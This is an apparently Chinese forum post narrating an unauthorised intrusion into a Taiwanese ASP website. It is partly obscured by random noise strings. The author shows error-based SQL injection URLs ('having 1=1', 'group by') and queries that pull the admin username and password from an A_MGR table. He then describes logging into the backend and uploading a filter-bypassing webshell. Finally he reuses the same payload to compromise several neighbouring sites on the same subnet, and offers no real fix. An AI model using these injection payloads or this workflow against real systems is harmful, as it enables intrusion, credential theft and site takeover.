发现一个注入点
( X1 m% i1 S* V" l$ c* ^http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833898 v4 s$ D3 |' H7 m) c
) N$ m6 v E$ s. S3 x
习惯性的加’having1=1--- n" A- s: z. N, u B* R1 o
: K$ m4 C# @& K* mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—# \8 X, ]+ A1 w, O, K5 t
' B1 ]( v# m1 z: Q
0 ^- C& `4 q, k: c% v. ?4 D
, s6 r. y$ w4 ^$ D) V9 R爆出Diary_A.dl_Title(这时候很激动啊)7 Y: |+ B! ?9 ~& _6 k! \
3 D3 ]8 Y2 j" y: ~9 Z$ ]" G
那么继续0 ~) d5 L8 @5 j; o/ d7 g' F5 z
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
* q( d$ q' [0 e H l E- v& a7 w) |! p' T" g# x6 X" A
继续,一直爆下去
0 x! [' F) m# O E% Y5 O7 l# a% n$ [- H! v" r
爆到几个字段和表段 但是没找到需要的管理用户的字段
% b7 |' A3 c2 ^ w9 ~/ r; u
, U: B; ]5 Z3 f( X+ i; Z8 s0 k+ f$ x蛋疼了 怎么办 然后去后台登陆页看源码+ U8 j ^; i/ S3 m& X# Z* m
) H- o; G* _9 I) o9 i. t0# M; u/ o9 K- W2 G. H+ C
3 D. L: G1 M* h; T- Q5 r! _! CInput name= “ADUID”
( z# g, x4 i3 Y4 pInput name= “ADPWD”
/ b7 H" I7 f( p8 J1 @# Z
. [1 b9 j5 F6 U! S很幸运 找到了字段那就继续6 m# \: Q% _7 s; d: I. N2 Y
找到之后开始爆用户+ {8 r p2 D* V1 p3 S+ @3 [+ S
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—4 v+ ?8 k8 `2 a, k0 ~
爆密码# J( M7 ~* Y% o7 V
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—$ A- x3 o, @% ]8 h' ~
测试了下 这个注入点只能爆到文章哪里的表
- L* M% Z7 n; X# ?8 m
- H) l( X: ?. X. w6 o0 K' u头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了' b$ q% o& a# i" C% M3 _+ y
: y" }# ^% @5 i9 h- g* u
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
* ~6 W1 \2 F2 F- G4 r) W) c8 A: A( E( H- Q$ g+ w7 y/ [
4738 x: L `2 y1 L( r
$ p% J3 u( n5 M1 z进后台8 q; y* J1 F- |& W* |/ ^
) Z4 L w. j4 J" t& I* }1 m* E0 H$ K% P$ D5 u6 J0 \1 K9 a6 T% x8 @/ R
发现几个上传点 有的地方不能上传 而且防止恶意代码0 b. ~6 t; g/ J- W6 E0 s
i! q9 _. s4 q- h5 N$ e
没办法 各种百度各种找大牛 找到一只好像可以突破的马
' @$ ~5 b4 ^7 H& g: k( Q- h8 s4 \: ^+ j: \( H U
. @" b' |+ v1 W) [9 m0 B( s3 Y
在系统管理那里直接上传 不过没有显示地址$ l1 R g, W5 O) T
" q! j' T, R: ]
再上传一次 抓包 搞定OK
. K; _0 i' ?, S
! Q/ U2 a, y, v \& D+ S7 `% O3 r& t: z5 j+ R; N) R8 {
( M: L! r' P: I. @$ I472# d9 ?' j) z5 k9 H$ e4 C& [% y
; d: \, P; p0 ?) ^" K; n
晚上不行了 去睡觉。。。& {, D4 j3 V5 _+ Y; O, K( o0 l
第二天刚起床 闲的没事做继续日站吧
* c# A/ l; z5 [( \5 q, T2 f" j3 P. T: b
找个站 就把这个站的旁c扫了下- n6 _4 O) r/ e# Q! G- u) c! u3 y3 @
' r3 s. F* j/ c发现c段也有一个购物站 ,然后还和这个站的模板差不多+ y: d) w3 o: {, B0 b
3 ~' o! \+ v( G* Q9 H8 {- c( V2 p$ `就找到会员登录口测试" t$ q% j, \* P S
3 E% @7 X* ?0 W' ?, I'and (select top 1 MGR_UID from A_MGR)>0—& T- f0 y7 a* p4 c! g1 |
果断爆到了 这时候我很激动 通杀' O! m1 T: \! T e: x
( \& m8 h9 ?! k" v3 a' K# K+ A再次翻c段* k4 b+ ^0 w# K) C2 ~
) J8 M& b/ R% R, D
翻出几个站 都成功拿下
* K8 z( k1 q! d/ H, m# F' J1 k$ e0 d" S# z2 X5 K
) ?. J8 e) y+ R8 `4 G" x4 m2 n
7 y) p! t" m/ L4 ]2 ]修复方案:
1 a4 {: g5 j: u* R4 F他们比我专业 + G: X6 s7 \ Q
. _2 d" t& Q4 B' Z6 k( u: |
$ w2 A/ j9 B1 `) o' {7 ?$ E
4 m6 K a4 D H$ R9 f1 s6 W* x |